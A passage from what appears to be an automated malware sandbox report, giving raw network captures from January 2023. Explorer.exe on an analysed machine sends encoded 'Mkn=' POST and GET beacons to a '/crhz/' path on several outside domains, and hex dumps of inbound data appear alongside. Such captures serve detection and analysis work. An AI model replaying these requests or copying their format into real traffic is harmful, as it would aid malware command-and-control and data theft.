c0 09 93 04 dd 44 b3 11 01 4a e3 08 25 29 21 a9 96 49 bd 24 98 66 0a 2a ce 61 cb 9d 4e c3 c0 73 b3 20 8e f6 42 ff cd 27 69 1c 41 c1 d0 4d d3 c3 16 09 07 da 76 cc 26 ae 3a 4a dc e9 b8 f5 e8 a2 f5 33 42 7b 96 b5 f6 8b 16 e5 20 d8 a6 ad 76 eb 67 1c 72 ff 0b 00 45 1a 00 f7 1b 36 f8 0c d8 c2 cc c0 97 ca 45 6a a2 b2 68 44 f2 bf 77 ca 06 29 07 9a 25 61 03 10 64 52 d5 f6 8b 2a b5 5b 3e e3 15 82 1a 40 fa d5 df b4 ab ef 94 ab 6f ae fe 76 f5 f5 d5 df af be 51 ae 7e 07 8f 7f c2 87 6f e1 eb 3f ae fe 0a df df 63 ea 3f ee ff 76 16 67 07 57 7f 05 1c d3 d9 20 0c d2 31 4b 5a fb 17 cb 78 84 1a ba 51 f0 94 c4 d5 ba 84 72 31 0a 18 7a c0 cf 3d 4e 5f aa f4 67 cc 4d bc b1 c8 68 b7 32 37 19 b1 8c f0 0b 80 77 a3 2c 39 ff 04 94 3b e3 75 fe 9c 4d a6 a1 9b b1 06 e2 6f a5 87 17 29 e1 3c ca 58 32 39 4a b3 24 88 46 97 c8 c6 6f 67 2c 39 57 83 68 3a c3 56 49 d8 6f 67 41 02 dd 80 fa d3 62 91 d6 e5 97 ed 56 10 7d 00 d6 61 06 da 85 e4 c8 44 5c b6 4b de 3e 96 2b ba b4 d9 e2 2a e4 42 f3 2c 6d cc 30 1e c5 b2 48 de 9f 00 43 1f 0f 9e 30 0f 65 52 c3 e3 52 56 84 1e ee 21 d6 bd 00 51 ed 2d 65 e0 74 aa 8a 2e b2 37 9b 86 b1 eb a7 7b a6 6e 5a 7b ba b1 f7 9b b1 9b a5 3f 9f 4e 55 e2 48 c5 64 55 37 54 dd 56 dd 4c 35 4c cd d1 35 cb 51 4d 95 19 9d ae 6d 75 bb 5d a7 63 59 96 f6 64 ca b0 ce 02 eb af 5e 3c 65 b2 cb ad fd 9e 65 b5 41 62 c1 68 9c 89 1f 9e 9b f7 90 bc 69 40 6f 48 46 2b 54 be 4e a8 97 97 5f 5e 3e dc e3 dd ee 91 30 c5 7b 0b c6 56 23 e3 79 e7 4e e9 11 1e f8 51 aa 82 91 1d b2 cc 1b 3f e0 6e e1 41 85 1e 19 Data Ascii: v0Hqb9-Ioy@Ib2u8dg'YvBTU7"qnvWWUWWWU_{)l>?H[IF1Sye$eaW v:4NQ"<l\|ch+Ad@4 :VI<BR#Y6MFH03x$Y ggmea\|@{tUUqi1iLWNldcM3w?VlDk9/yd4Nit{)UE OS8FfX>R?UFx~^%a+1FA{`%DJ%)!I$faNs B'iAMv&:J3B{ vgrE6EjhDw)%adR[>@ovQ~o?c?vgW 1KZxQr1z=N_gMh27w,9;uMo)<X29J$Fog,9Wh:VIogAbV}aD\K>+B,m0HC0eRRV!Q-et.7{nZ{?NUHdU7TVL5L5QMmu]cYd^<eeAbhi@oHF+TN_^>0{V#yNQ?nA
Jan 25, 2023 13:21:59.122395992 CET	142	IN	Data Raw: 77 5e 80 e7 e6 3c 0d 41 5c a9 36 4a 33 50 34 8f 43 7a 49 9c a6 71 12 a0 5d 27 ec 80 19 a4 1a 81 f2 48 68 c8 13 b9 21 e8 7f 84 7d ab c6 ec 25 69 fa e6 d9 04 fc 25 d9 de c2 5a 2a f7 43 17 2c c4 81 72 f5 4f 30 1c 5f ff 7f ff cf ff 3b ef c8 64 39 0d Data Ascii: w^<A\6J3P4CzIq]'Hh!}%i%Z*C,rO0_;d9Z'\}{0YCJ23iv)4PtM?$~(w>xs`)w~71}pA9gj:v.+bI54&}1]=U7FtuM];\FR
Jan 25, 2023 13:21:59.122471094 CET	144	IN	Data Raw: d7 7d 3e b4 56 c5 f8 34 9f 6d a3 ae bf 7b f0 bc 9b 1d b8 61 6b b1 85 80 82 a7 1a 7d 65 67 17 c5 dc 0c fe 6a 80 c1 0f f5 34 c1 6e 8b 9f 07 c4 82 0a e3 e1 09 44 0a bc dd ea 4b 02 bf 3f bd 28 e6 5d 4a 8b 50 4c 76 c0 40 6e 36 89 d2 7a 13 41 0a aa 8d Data Ascii: }>V4m{ak}egj4nDK?(]JPLv@n6zA>w+%`5lb`M<\|b,&Wm=eWkukb+(1krb(5)RxE0R^#:Kp"kYm5n}=[r[P"h
Jan 25, 2023 13:21:59.122541904 CET	145	IN	Data Raw: b5 4d cf 6a b3 73 d2 ef bd 87 67 9e aa 73 10 8b f5 be 50 b2 78 ba 8f 7b a9 ab e8 36 14 69 6d 6b 5d af 75 96 88 5b 09 83 86 2c c5 dd b4 51 a7 75 ba 87 5d f3 42 c9 f9 b7 e8 df 0b e2 5f 73 bd 2c 38 61 9b a9 fd cf c8 f2 2b 3b d2 0e c0 6e a7 3b 3d db Data Ascii: MjsgsPx{6imk]u[,Qu]B_s,8a+;n;=U.!kkRgz$#~mbp3GJ[yfUy3-\|93TrA\|kKbr{!,T`T'n+,'2rd.\|Hg;==N-0
Jan 25, 2023 13:21:59.122622967 CET	146	IN	Data Raw: 15 99 d6 54 e1 25 c9 76 fb 82 f2 f0 d4 d4 56 a4 94 ce 22 55 79 2f 09 f6 95 de be 8e 6f 06 31 f0 7b 01 9d 2c 98 87 7b b3 50 d8 aa 3d 30 56 0b 8f e5 b3 9c ff 82 3c a2 a1 7b a6 67 77 65 8f 58 4d 7a f5 3c a2 09 b1 b9 63 0f 4d 05 47 f5 78 46 9a dc 16 Data Ascii: T%vV"Uy/o1{,{P=0V<{gweXMz<cMGxF).xtNJM%^-=\|'n-<PQw(?- E~{3\YPrH<7_.'ud69g>72S\'l"jQ(#}~u.Lv(1OD
Jan 25, 2023 13:21:59.122684002 CET	148	IN	Data Raw: 75 34 08 dd e8 b8 5c e9 ad af 8a d8 3b 10 47 e1 79 eb d1 6f 04 07 d5 19 f1 87 41 39 21 3f c0 09 f9 9c 51 69 4e be 58 59 98 9b 4c 7f a1 02 a4 25 2a d5 ad 2c ba 57 25 d8 35 07 5e df 36 5b f5 8b 68 37 11 dd 27 39 ed 66 d9 95 cb 68 08 f7 aa 09 0f 97 Data Ascii: u4\;GyoA9!?QiNXYL%*,W%5^6[h7'9fh,<ngxvA~B+Ypj,_qo7nsI@Z^6J;>\|j@H@}!<?$>I89^c!T7yidu{j3KwN)
Jan 25, 2023 13:21:59.122805119 CET	149	IN	Data Raw: bf 59 34 7e 60 12 41 12 df be 08 5b 67 eb eb 08 63 20 39 6c 63 a1 f9 2b b1 8e 2e 29 fe ba 63 8b 3f 83 a3 fd 1d 57 00 8c 60 be 82 bf ef aa 2e 75 cb 95 5e 67 d4 50 51 e1 9e 5a 36 7b 1e f9 2d a9 10 2a 30 0c 1d ff 85 b1 d9 5c 2b d2 9c 28 98 e4 a5 53 Data Ascii: Y4~`A[gc 9lc+.)c?W`.u^gPQZ6{-0\+(S{yoA33i;?w=LG.n8azkY\|mG4&!w&\|sd0NC:`EZ+,b}iVMkIxDH5Y&9+b
Jan 25, 2023 13:21:59.122869015 CET	150	IN	Data Raw: ee 4e 5f b7 a4 68 65 fe 5e 21 9a 90 dc 86 fc ae d9 96 a2 01 37 29 c2 a5 27 0a 4a 37 ae 50 7d 0e 32 7c 3b 1b d7 33 3e 9f a1 19 a9 82 c2 72 93 15 6d ba 3f 0c 92 e2 76 f2 5c 48 f4 f6 3f 7d 55 c9 d0 5d 28 c8 a5 bb aa a4 8a 77 78 66 30 76 8c 5c 0f bb Data Ascii: N_he^!7)'J7P}2\|;3>rm?v\H?}U](wxf0v\aA"s.=oST)s.R8qK5Wo7,ps-\O-xn"$Fz,m54R`yy[Vd;SVyml&,mnF
Jan 25, 2023 13:21:59.122936010 CET	152	IN	Data Raw: 99 08 1e c5 26 36 2a 5c d3 4e 02 6a a1 a1 e6 5e 30 b3 78 6f 7e fd fe 46 11 69 d3 9b 0a e7 f6 ee 89 20 ba ba e7 72 e5 ae 4b ba b1 3b 8c a3 91 ea 26 f8 3e 6e 37 cc 38 66 79 fb 65 c5 2e cc ef c4 5c 83 6b 29 be a7 13 c2 7f b9 fa c3 dd 5a 44 73 2f c1 Data Ascii: &6*\Nj^0xo~Fi rK;&>n78fye.\k)ZDs/BvJlm\|;2-B5tVibgaLWiiS=BIUa?MXS+x:l1'o>&EpeW/iowV]qU= N[}__6
Jan 25, 2023 13:21:59.123001099 CET	153	IN	Data Raw: 03 6d 72 7e 3a c5 b7 9d 43 6f d7 82 70 0f 57 e6 12 20 7e d8 3a 1a 84 6e 74 dc e2 c3 dc 28 1e c6 78 7a 97 96 66 bf e2 37 db fc 8d f6 6d 7d a3 5c fd a3 75 f5 27 e5 33 c2 a8 fc 86 0d f8 fa dd 92 97 4b dd 74 d0 73 33 85 ed 0c f5 4e a7 f2 b2 b2 6a ca Data Ascii: mr~:CopW ~:nt(xzf7m}\u'3Kts3Nj^7}7BO014ax_MEBr]Zy;ob\~\Fj %EV.`IC41fFOR;Y4K/k
Jan 25, 2023 13:21:59.195797920 CET	154	IN	Data Raw: 20 e2 e8 df f1 3a c2 5f 30 bc 90 70 bf 65 e8 3a 24 e2 dd 4d 9f 83 bf cf 70 61 6d bf 65 b5 2e 37 6d ed 3c 0e 95 cc 27 04 b8 0b 51 29 de 5b 9b 47 0a 87 87 d8 9d 20 ec f8 ec 7c 32 88 43 e8 0d 29 3d cc 67 68 50 27 7a 7f c3 5b 05 6e 56 18 42 01 c9 2e Data Ascii: :_0pe:$Mpame.7m<'Q)[G \|2C)=ghP'z[nVB.k2l&c"RNV~Ajc`2\| \|fysp}}yAr0KBBNAMRR#J6KVcV+H^$21 :d'aVd<QS@$~DIzC

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.3	49721	81.169.145.72	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 13:23:04.831597090 CET	250	OUT	POST /crhz/ HTTP/1.1 Host: www.frogair.online Connection: close Content-Length: 5333 Cache-Control: no-cache Origin: http://www.frogair.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.frogair.online/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4d 6b 6e 3d 76 77 30 6a 4e 31 43 6a 39 4c 34 4a 46 44 70 70 6e 71 4c 39 74 72 6e 76 73 51 73 7a 6c 76 63 77 6f 67 4a 47 6e 48 39 58 54 2d 7e 68 47 5f 74 6d 4a 35 39 56 6c 4e 4c 36 39 4d 53 43 44 45 33 6b 53 66 6a 34 64 4a 69 78 67 6c 55 57 58 2d 6b 31 46 77 6c 67 4a 47 50 38 4a 67 49 63 67 66 6b 4a 6c 46 47 76 46 76 50 4f 6e 36 49 44 49 67 4b 59 74 42 6e 72 4d 51 59 53 6c 6c 65 72 6b 51 6a 4c 33 64 43 6d 62 32 4b 41 71 67 47 47 62 68 6e 71 69 79 75 78 28 6a 4b 4b 35 57 55 77 61 32 6f 32 6e 44 30 61 65 45 62 66 63 2d 73 75 6b 37 28 73 55 5a 77 5f 79 36 55 44 73 39 59 35 6b 79 4e 56 39 73 34 65 6a 75 57 77 63 64 69 71 4a 41 4c 43 48 42 4b 71 34 66 4c 79 67 65 6a 37 57 42 47 4e 4a 74 55 63 4e 48 46 72 4c 32 6d 5a 74 51 69 71 55 46 79 74 65 51 66 63 49 39 51 6b 35 53 6b 64 52 37 4e 59 43 4d 7a 46 6e 44 41 30 4e 71 73 62 6b 70 66 4d 78 38 51 38 37 50 6f 47 35 68 6a 74 7a 49 6a 35 4a 41 6f 66 47 4d 75 38 34 41 64 6b 32 37 51 6f 48 76 6c 4c 70 2d 57 71 70 61 76 5f 75 48 73 45 54 31 70 6c 64 76 28 55 71 75 61 30 52 6d 6b 6a 66 35 45 53 58 59 7a 47 52 7a 51 41 44 41 34 6a 54 42 52 44 57 2d 32 51 56 54 41 30 38 55 67 44 46 5f 31 61 58 73 7a 53 55 55 4a 33 56 38 4f 6a 73 59 6c 4a 51 78 37 32 7e 30 50 42 46 70 67 7a 4f 30 41 48 54 71 7e 74 51 78 7a 6b 52 58 68 6d 39 75 28 70 56 43 6e 65 65 34 54 53 70 41 53 51 72 7a 38 2d 75 47 38 44 53 49 64 46 6c 37 41 6e 63 35 57 54 52 57 43 51 6e 49 56 32 68 35 64 6b 57 74 76 46 51 38 35 64 43 69 68 44 63 52 33 75 46 6d 76 43 4a 33 69 30 73 4c 49 50 72 7a 7e 6b 7a 73 64 76 58 71 75 50 54 56 6e 36 30 74 44 6a 45 67 43 2d 50 37 33 59 4a 7a 69 6b 66 5a 69 46 50 67 39 44 66 37 4e 35 28 76 51 4e 55 61 43 69 6b 36 65 32 4c 73 73 65 4a 66 5a 6e 45 6b 46 59 42 39 50 6b 6b 36 62 59 44 63 7e 59 65 74 45 31 74 45 72 73 45 75 36 6f 4b 55 39 67 73 6a 65 69 45 33 4f 32 36 6a 49 6b 4e 79 54 77 39 36 67 51 6d 78 30 79 75 52 37 73 57 31 4d 68 6d 64 33 41 53 49 33 54 41 79 4a 33 67 57 77 43 73 4a 61 76 30 72 68 4a 30 30 7e 4d 6e 79 67 55 6d 65 46 6a 6b 49 44 62 63 2d 72 5f 52 4c 62 61 73 48 65 48 62 4d 7e 69 49 77 61 68 39 70 4e 35 6b 34 33 43 4a 64 69 58 63 54 45 41 73 65 49 45 72 5f 4a 65 64 4f 6b 77 45 6e 46 6b 68 67 46 79 49 70 28 69 63 48 4c 33 53 4b 54 49 4d 4e 6e 46 4c 51 41 71 62 49 32 5a 79 66 76 67 67 44 34 4a 51 4b 70 6b 6d 59 58 39 4f 56 6d 5f 46 42 69 49 36 4c 67 62 67 65 47 66 76 61 4f 46 6d 7a 58 4f 44 44 38 5a 45 74 6f 4f 78 74 34 69 75 69 51 44 45 47 41 78 32 51 39 4c 69 68 48 44 39 5a 51 51 34 52 4d 4b 31 33 61 6c 47 6d 66 53 73 4a 6c 48 62 33 55 70 44 53 28 34 54 5f 59 51 59 6b 79 4d 63 4c 56 68 66 64 57 57 6e 63 58 77 49 58 59 30 79 76 41 35 78 77 67 4b 53 4d 55 7a 53 48 52 39 75 4c 77 31 37 47 52 2d 52 68 58 4b 52 32 48 47 4f 51 5a 75 4a 63 62 4f 47 6c 44 54 50 69 49 6a 48 38 4c 38 76 59 47 6f 74 77 35 70 33 33 45 2d 79 65 72 56 58 4e 4c 52 36 33 30 4b 41 6b 6e 66 79 77 6b 68 46 68 52 66 37 31 57 56 6b 6c 28 55 5a 6a 28 64 57 51 52 66 68 38 79 74 36 47 4f 32 5a 4d 72 51 30 58 63 71 36 4d 46 4c 49 52 59 30 4e 46 30 51 70 6b 61 59 78 6b 56 47 4c 49 70 52 73 36 4d 7a 42 72 79 6b 46 58 62 66 6d 42 69 49 4d 75 6f 68 36 45 52 76 7a 75 47 38 6e 79 47 2d 5a 43 4a 75 36 77 7e 5f 30 72 6d 62 34 61 51 74 51 77 47 61 6e 62 68 6a 6e 55 52 66 51 67 51 71 4a 76 6c 6c 59 33 32 70 72 51 56 62 41 62 31 37 43 6c 35 6a 41 4a 68 2d 76 31 63 5f 6d 4e 74 70 79 67 7a 37 55 4f 28 61 6a 63 6f 6e 32 61 35 66 44 78 68 31 68 6c 65 46 6b 7a 39 4c 45 79 58 62 6f 56 51 51 47 73 38 5f 48 38 48 55 68 7a 74 4d 66 76 42 4a 69 77 4f 33 42 56 61 57 4c 6c 74 46 4c 67 79 32 6c 47 31 61 41 62 7a 61 48 35 62 4a 64 44 77 72 6e 39 62 66 33 68 38 49 62 62 6b 73 61 30 45 32 58 63 63 72 7a 50 50 42 47 32 70 55 70 33 32 68 33 43 45 52 30 49 6e 52 68 78 52 72 7a 31 43 79 69 4a 43 6d 4b 53 73 5f 54 52 31 70 5a 33 7a 54 6a 30 28 37 61 5f 72 56 78 4e 45 57 5a 4c 6e 62 42 69 79 56 6e 46 66 52 65 64 70 71 77 6b 73 51 7a 79 32 68 71 73 47 41 4a 55 51 79 67 76 47 63 6f 41 4c 5f 51 6f 46 77 58 58 32 49 6f 58 7a 43 33 65 6a 72 37 64 57 56 72 48 77 6a 68 64 73 4a 78 78 59 4c 70 42 5a 2d 72 48 37 63 77 57 49 39 28 6e 53 4c 61 6f 39 35 55 38 43 Data Ascii: Mkn=vw0jN1Cj9L4JFDppnqL9trnvsQszlvcwogJGnH9XT-~hG_tmJ59VlNL69MSCDE3kSfj4dJixglUWX-k1FwlgJGP8JgIcgfkJlFGvFvPOn6IDIgKYtBnrMQYSllerkQjL3dCmb2KAqgGGbhnqiyux(jKK5WUwa2o2nD0aeEbfc-suk7(sUZw_y6UDs9Y5kyNV9s4ejuWwcdiqJALCHBKq4fLygej7WBGNJtUcNHFrL2mZtQiqUFyteQfcI9Qk5SkdR7NYCMzFnDA0NqsbkpfMx8Q87PoG5hjtzIj5JAofGMu84Adk27QoHvlLp-Wqpav_uHsET1pldv(Uqua0Rmkjf5ESXYzGRzQADA4jTBRDW-2QVTA08UgDF_1aXszSUUJ3V8OjsYlJQx72~0PBFpgzO0AHTq~tQxzkRXhm9u(pVCnee4TSpASQrz8-uG8DSIdFl7Anc5WTRWCQnIV2h5dkWtvFQ85dCihDcR3uFmvCJ3i0sLIPrz~kzsdvXquPTVn60tDjEgC-P73YJzikfZiFPg9Df7N5(vQNUaCik6e2LsseJfZnEkFYB9Pkk6bYDc~YetE1tErsEu6oKU9gsjeiE3O26jIkNyTw96gQmx0yuR7sW1Mhmd3ASI3TAyJ3gWwCsJav0rhJ00~MnygUmeFjkIDbc-r_RLbasHeHbM~iIwah9pN5k43CJdiXcTEAseIEr_JedOkwEnFkhgFyIp(icHL3SKTIMNnFLQAqbI2ZyfvggD4JQKpkmYX9OVm_FBiI6LgbgeGfvaOFmzXODD8ZEtoOxt4iuiQDEGAx2Q9LihHD9ZQQ4RMK13alGmfSsJlHb3UpDS(4T_YQYkyMcLVhfdWWncXwIXY0yvA5xwgKSMUzSHR9uLw17GR-RhXKR2HGOQZuJcbOGlDTPiIjH8L8vYGotw5p33E-yerVXNLR630KAknfywkhFhRf71WVkl(UZj(dWQRfh8yt6GO2ZMrQ0Xcq6MFLIRY0NF0QpkaYxkVGLIpRs6MzBrykFXbfmBiIMuoh6ERvzuG8nyG-ZCJu6w~_0rmb4aQtQwGanbhjnURfQgQqJvllY32prQVbAb17Cl5jAJh-v1c_mNtpygz7UO(ajcon2a5fDxh1hleFkz9LEyXboVQQGs8_H8HUhztMfvBJiwO3BVaWLltFLgy2lG1aAbzaH5bJdDwrn9bf3h8Ibbksa0E2XccrzPPBG2pUp32h3CER0InRhxRrz1CyiJCmKSs_TR1pZ3zTj0(7a_rVxNEWZLnbBiyVnFfRedpqwksQzy2hqsGAJUQygvGcoAL_QoFwXX2IoXzC3ejr7dWVrHwjhdsJxxYLpBZ-rH7cwWI9(nSLao95U8CaFbzXXXP6GnOOR4z1lqXsmO4pc8Rm~AebdXOD36BmQlTmR2toTn9CacZQV40uB9WxUMI0~Sc7zAPZ3emhqSKvHkdFRnn5bM(_XoqvEdHGAKMNkylHxHuOAoCwrpQlmcuZvCEiS1jF9P1RYakM7G8V9bXQdM7KA6gFkFWrCU4TktgBvW6O6ZMe4intE-b8I8dxxLIzpPJj27gMpfM75r8PCcExaowHq1GznjMgrMTkeUje1YFgI4boMcyHa_8fRCyzojTYWGpNBtWcFzh0PCZ4xjzMDC4TtWk4AZXrDPrycj61vKLDUiuPNgbe9VOUccGf5ISSOXnsKc7H1Yv9lqfNYOfreXYoy8uzVbTNlAnucYaWl8HhX4l3wLGubJmLV7~uEvnIt7lx~ZbubOruFR(GmEp1eHLmMeaJRNPGJ9vWflf9l61GYLN_ZthZ9pV_aWUtNUrMhv4u2JRum7U2(8YIpSScsOQkxLIAz-Wu8IUXEFXBCdj0N5OWjrY9XqQey1gIq7ao7t5aP6KTE-iz4h0ipUdFp46NQfNGKZ1SsfpYb82AW59KlWySEPRpIhZ2knbXk2pZZDc_NwClJEkhWE7_FPFginx0~wkYWRSCZ-(TsJ~bEMSFNxYxIdjMypQxTgshPxfCAMZAf5eDkfzk9Ctd5BTzChsuo50BZsyYZ_gjhzrseU7yaX87AySg4XRak0UnT_~yAGw7jyZZBhwJeATVCtfj66MQszB4lt~HqAavGLfwA2PyM_geKnPNWq6p14OZ3of_JtD1gbmHkmVAIyIldObvlrWb7LG269WXvjns1tQrTwWhnBOQoOg-EuXrhCvPhY(4LRZNZt1XfRsoTmFemOxpNHHGNZxC6c6ZTKKOVJa6VCqHUFt2xKTCWUTUHNdAiDCaKiK92au42b(00FR0ZEX4Phy72Et_oDyIrnbPkNXARVzSRgpF2UDZAo6F1_(iX_sIyaJPAwdJr9MR8anhoUWvNOTHHC~hvUaK0OZbUCYvcfhFL6wLtGnvFalTv9aWhEsrmdJ9lShEHuEk0NLmLnDYouCIKk(oECT09MW5Rj(EPLXt11nP9k64XEtfna(RAiXr0yFK(PWcpvblW_t4Q-YWLLUtuSJhDwdE69A_WVG3tvKeAepDa71Kz4o3UIvsuLfd5uqAyENC8wyOpI3yjb7y7IY4CuK6tAY-SA~WQkc6tubhOx6d1iqiBr5ahe0D81pY~XcUBpiVcuTntUrqe8y5vOacHeL_ofX4Zi5dmwF-k1Ree-InIkIPx3I7u72K8Ylj8v2WfzkKnvURWQ5d5XJ9JHLuLGisulSI(o86roG7U0u15iQxaCb2r8lDWlbfCQLxI4~s6m~SjU1p8IfDcCnqwwRI5_ce0LJuWvhSOhv05jo72txAStKSKB0yyBuLHRUX1imSNqwQGogVpiY5bNl9tnR07W8fbb~0GHqWtbt0GFxnCOTAFdgvSLe-SyuqlrdQL6o3YXAxbZjUBxKxxpsLuCYkwbCtnoUyzS4RcY2kaZuWmzn8wCGAC7Ivmq3Aa6wj3cPYc4z-YZEq9R157W~Z70ijctu1lM(s4OVM41SWNFPt1kiXly2Y~ZbiJH3NL8orlahFmqOUmfiTkO5bzk5f6s~MWHK58ZxFdMIsKoJni2pVK9tSfFzSEdN4RS3Uj-VLg5IIbUPtv18KCgDtGrmkHQ9IDwwzRTHE6sC2APtOXhMSBwLO3CdyJGMtS_FhGJTZJF4zcMIZjsN3SYcNKXvO1v6fdNzL4RvVgz~w20wW(Efx6q02xc(Dy1oWa71IedCw7dquS2ress3m9ZwqSeSdW6MxLbFMrU3POwDrFh2QFZTTKUCoMtK3M7hguYJeXmvrVbpG(KpAF20NiMEmO3yRa5ZUptTou5xjrGmNFZYSJRVEGHSygZBcNq69kfZOL-hBkNkMAd2vy-8r(FbfcFWXuUkCaTDJzdL6X3q4EZy38tJpxBa-~6c0EX~-fHoKxm5wc5DfbBl1wfg8XvCW1TtRSUpi(DbQxL5II8o-ftYcZ-WJT_xMZEKAaIY3VPV2Yzmw6Dbe0njPcdACQ1hmqc5D4PIYX9eMV4RU2vnQFEbhCFxSCJ5CAZqT4EJehdUw7p~xpqblmgmKwCoMF0CKdVurncQnF8qHVqssvHf0WsWAOoLJqmoXIRVuos67gEOiJfvvv3hVnHMz4ZfXmN(LaNyrADwI19l-qW2aomdxDVu_vHnl1SWruQkMMDC-x6jzMPpvPhFeAAoMLS89AeE68CPZG5DQuKxd(BZQuppCPpXK7Z1gtsD5HFukqUtB77LG2RXbR6Hy~C4VZmm6kYvkiBtDO8nVDHMaqzAHJJjjt2MTctg4Oe7CSb4pZhHPCWmuYJEw~VbAMyhME70Qg3ncovc68VyMGJ~ihyDmylmmATBxxkzZHxIdCLGWgJibDPGjqaXLY3UOkjmhrujI2fG0hXA2H9C9OSdBVo4ilcgcmyhUOO81cBAiCHF-uVh9TwSsxHAXpnNl4RQhGvTUtQ(awRcZg-yY~NZonz4nqve2zIfpxGSMNoLCD2mfjKhs9TxHRR9UdVRCOzrdrBxqM3ivR2B79Uq-juma0iyD~eSRPwFMwD4KgHeFcckEaGON8ZUdzzFmNwb1cdMKP9b-RVQcQIh-0bJR9xJ06phWeM8NFoT0VFb0kWpcqmdfJEvU~loq4i0YQzE7qS69hLQFURPdfNiEbrXncKDMTC
Jan 25, 2023 13:23:04.852343082 CET	251	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Jan 2023 12:23:04 GMT Server: Apache/2.4.54 (Unix) Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.3	49722	81.169.145.72	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 13:23:07.379401922 CET	251	OUT	GET /crhz/?Mkn=iycDOFv4tLFlCihz1M/bkpzttTI3wOwIoAcOv31GIYKsRKZ8f8EzkP6Z56SPUyztaOnMa+iauXtsUeY/SnJDQAP7ZwMaqvgwrA==&vux=DmStydFUWc8HD HTTP/1.1 Host: www.frogair.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 25, 2023 13:23:07.400816917 CET	252	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Jan 2023 12:23:07 GMT Server: Apache/2.4.54 (Unix) Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49704	185.151.199.52	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 13:22:00.517616034 CET	160	OUT	GET /crhz/?Mkn=O29nP3ATS/5Z6K6ZOqFFpve/mTBG7paw5+pol+lVZCotPeZJEV3KnsQwBw1FpEdPbpeQCJZSqBlkKVIQIQyxkbVFYCGm9IFlQQ==&vux=DmStydFUWc8HD HTTP/1.1 Host: www.n-r-eng.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 25, 2023 13:22:02.529448986 CET	160	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 25 Jan 2023 12:22:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://n-r-eng.com/crhz/?Mkn=O29nP3ATS/5Z6K6ZOqFFpve/mTBG7paw5+pol+lVZCotPeZJEV3KnsQwBw1FpEdPbpeQCJZSqBlkKVIQIQyxkbVFYCGm9IFlQQ==&vux=DmStydFUWc8HD Vary: Accept-Encoding,User-Agent

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49705	164.88.201.214	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 13:22:08.082201958 CET	162	OUT	POST /crhz/ HTTP/1.1 Host: www.sandpiper-apts.com Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.sandpiper-apts.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.sandpiper-apts.com/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4d 6b 6e 3d 47 50 76 34 42 78 75 39 6b 78 61 45 69 49 75 4b 72 4a 37 72 63 31 41 72 28 79 4c 57 33 54 36 4e 42 30 55 46 43 52 53 30 50 6e 65 57 67 77 74 78 74 63 43 62 67 35 33 30 5a 5a 62 49 4b 48 69 6a 71 5a 76 30 54 79 